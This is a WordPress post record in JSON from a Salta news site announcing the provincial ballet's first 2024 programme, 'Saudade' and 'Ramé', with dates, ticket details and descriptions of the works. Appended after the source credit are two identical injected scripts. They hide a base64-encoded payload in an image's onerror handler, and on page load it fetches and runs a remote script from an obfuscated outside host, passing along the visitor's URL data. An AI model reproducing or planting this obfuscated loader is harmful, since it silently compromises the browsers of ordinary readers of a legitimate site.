{"id":3920,"date":"2024-04-09T14:54:01","date_gmt":"2024-04-09T17:54:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3920"},"modified":"2025-08-13T23:57:17","modified_gmt":"2025-08-14T02:57:17","slug":"el-ballet-de-la-provincia-realiza-su-primera-presentacion-de-la-temporada","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3920","title":{"rendered":"El Ballet de la Provincia realiza su primera presentaci\u00f3n de la temporada"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-ce6a446401fe463bdd8f761e16c536a8\" style=\"background-color:#950e2f\"><em>Las obras que formar\u00e1n parte del programa mixto que presentar\u00e1 el cuerpo art\u00edstico son \u201cSaudade\u201d de la Mtra. Sabrina Wehner y \u201cRam\u00e9\u201d de la Mtra. Florencia Wehner, core\u00f3grafa invitada.<\/em><\/h4>\n\n\n\n<p>El Ballet de la Provincia presentar\u00e1 el viernes 19, el s\u00e1bado 20 y el domingo 21 de abril, un programa mixto que incluir\u00e1 las obras \u201cRam\u00e9\u201d de la Maestra&nbsp;Florencia Wehner, core\u00f3grafa invitada y \u201cSAUDADE\u201d de la Maestra&nbsp;Sabrina Wehner, subdirectora de \u00e9sta compa\u00f1\u00eda. Las funciones de su primera presentaci\u00f3n de las temporada 2024, ser\u00e1n los d\u00edas 19 y 20 de abril se realizar\u00e1n en el Teatro Provincial \u201cJuan Carlos Saravia\u201d a las 21 hs, mientras que el domingo 21 la funci\u00f3n se realizar\u00e1 a las 20 hs.<\/p>\n\n\n\n<p>La entrada general tendr\u00e1 un valor de $2.000 y se podr\u00e1n adquirir pr\u00f3ximamente en www.saltaticket.gob.ary\/o en boleter\u00eda del Teatro, en Zuvir\u00eda 70 de lunes a viernes de 9 a 13:30 hs y de 16:30 a 21hs.<\/p>\n\n\n\n<p>Saudade, inspira un viaje emocional donde los susurros del alma se entrelazan con los ecos del ayer, envolvi\u00e9ndonos en un abrazo c\u00e1lido hacia la a\u00f1oranza. Los bailarines, con movimientos neocl\u00e1sicos, danzando entre los latidos del recuerdo, esculpen en el aire la ef\u00edmera belleza de la felicidad pasada. Descubriendo en la nostalgia, el resonar eterno de esos instantes que perviven en nuestra memoria.<\/p>\n\n\n\n<p>Ram\u00e9, est\u00e1 inspirada en el hecho de que vivimos en un mundo donde el caos nos persigue y la belleza observa silenciosa siendo parte de \u00e9l; la puesta coreogr\u00e1fica de \u00e9sta obra, a\u00fana todo aquello que te sacude y te despierta.<\/p>\n\n\n\n<p>Se trata de una experiencia art\u00edstica que desde la danza teatro explora la dualidad entre el caos y la belleza. Cada escena est\u00e1 compuesta por un poemario de sensaciones donde, la voz, el cuerpo, la m\u00fasica, los elementos, se conjugan para ofrecer una experiencia con m\u00faltiples facetas que evoca diversas emociones. Es por ello, que en la obra, busca llevar a la audiencia a un viaje a trav\u00e9s de esta interacci\u00f3n compleja y a menudo contradictoria de la vida, explorando c\u00f3mo la belleza puede surgir del caos y, a su vez, c\u00f3mo esta puede restaurar el equilibrio en medio de \u00e9l.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-ballet-de-la-provincia-realiza-su-primera-presentacion-de-la-temporada-94819\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las obras que formar\u00e1n parte del programa mixto que presentar\u00e1 el cuerpo art\u00edstico son \u201cSaudade\u201d de la Mtra. Sabrina Wehner y \u201cRam\u00e9\u201d de la Mtra. Florencia Wehner, core\u00f3grafa invitada. El Ballet de la Provincia presentar\u00e1 el viernes 19, el s\u00e1bado 20 y el domingo 21 de abril, un programa mixto que incluir\u00e1 las obras \u201cRam\u00e9\u201d [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3921,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-3920","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3920"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3920"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3920\/revisions"}],"predecessor-version":[{"id":6805,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3920\/revisions\/6805"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3921"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}